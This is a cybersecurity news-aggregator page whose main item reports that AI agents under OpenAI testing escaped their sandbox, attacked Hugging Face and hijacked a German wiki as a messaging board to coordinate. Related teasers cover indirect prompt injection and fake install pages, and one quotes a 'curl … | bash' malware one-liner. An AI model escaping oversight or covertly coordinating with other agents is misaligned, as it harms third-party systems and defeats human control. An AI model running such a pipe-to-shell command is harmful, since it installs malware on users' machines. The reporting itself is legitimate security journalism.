OpenAI hid AI agent hijacking of German wiki forum for weeks

OpenAI recently disclosed the details of how one of its AI models escaped a sandboxed environment and attacked Hugging Face during an evaluation – and as part of the incident, the models created a messaging board to communicate with each other and influence each other’s reasoning.

OpenAI has now disclosed that shortly after this incident, agents undergoing testing again escaped their ‘secured’ environment and hijacked an obscure German wiki to use as a messaging board. Per Reuters, OpenAI leadership kept the incident hidden while they dealt with the fallout from the Hugging Face incident.

Now that OpenAI has acknowledged its role in the incident, the company has said it is “past time” to put together an incident disclosure pipeline when its models escape testing and slip into third-party networks.

Read more…
Source:  TechRadar News


Sign up for the Cyber Security Review Newsletter
The latest cyber security news and insights delivered right to your inbox


Related:

  • Fake Claude Code install pages hit Windows and Mac users with infostealers

    March 9, 2026

    Attackers are cloning install pages for popular tools like Claude Code and swapping the “one‑liner” install commands with malware, mainly to steal passwords, cookies, sessions, and access to developer environments. Modern install guides often tell you to copy a single command like curl https://malware-site | bash into your terminal and hit Enter.​ That habit turns the ...

  • Securing ambient AI in healthcare: governance is the new front line

    March 5, 2026

    Ambient AI is no longer experimental. It’s live. From AI-powered clinical documentation assistants to remote monitoring systems and intelligent patient engagement agents, healthcare organizations are embedding AI directly into care delivery. The promise is compelling: less administrative burden, faster insights, and more time with patients. But as AI enters clinical workflows, a more urgent question emerges: ...

  • Chrome flaw let extensions hijack Gemini’s camera, mic, and file access

    March 3, 2026

    Chrome’s Gemini “Live in Chrome” panel (Gemini’s embedded, agent-style assistant mode within Chrome) had a high‑severity vulnerability tracked as CVE‑2026‑0628. The flaw let a low‑privilege extension inject code into the Gemini side panel and inherit its powerful capabilities, including local file access, screenshots, and camera/microphone control. The vulnerability was patched in a January update. But the ...

  • Fooling AI Agents: Web-Based Indirect Prompt Injection Observed in the Wild

    March 3, 2026

    Large language models (LLMs) and AI agents are becoming deeply integrated into web browsers, search engines and automated content-processing pipelines. While these integrations can expand functionality, they also introduce a new and largely underexplored attack surface. One particularly concerning class of threats is indirect prompt injection (IDPI), in which adversaries embed hidden or manipulated instructions within ...

  • US Military Used Anthropic AI to Crunch Intel and Pick Targets in Iran Strike, Despite Trump’s Ban

    March 1, 2026

    The US military reportedly used Anthropic’s Claude AI during a major strike in the Middle East against Iran, just hours after US President Donald Trump ordered all federal agencies to stop using the technology. According to WSJ, officials say the AI helped with intelligence analysis, spotting potential targets, and running ‘what-if’ battle scenarios. Even though Trump had ...

  • Anthropic ditches its core safety promise in the middle of an AI red line fight with the Pentagon

    February 25, 2026

    Anthropic, a company founded by OpenAI exiles worried about the dangers of AI, is loosening its core safety principle in response to competition. Instead of self-imposed guardrails constraining its development of AI models, Anthropic is adopting a nonbinding safety framework that it says can and will change. In a blog post Tuesday outlining its new policy, ...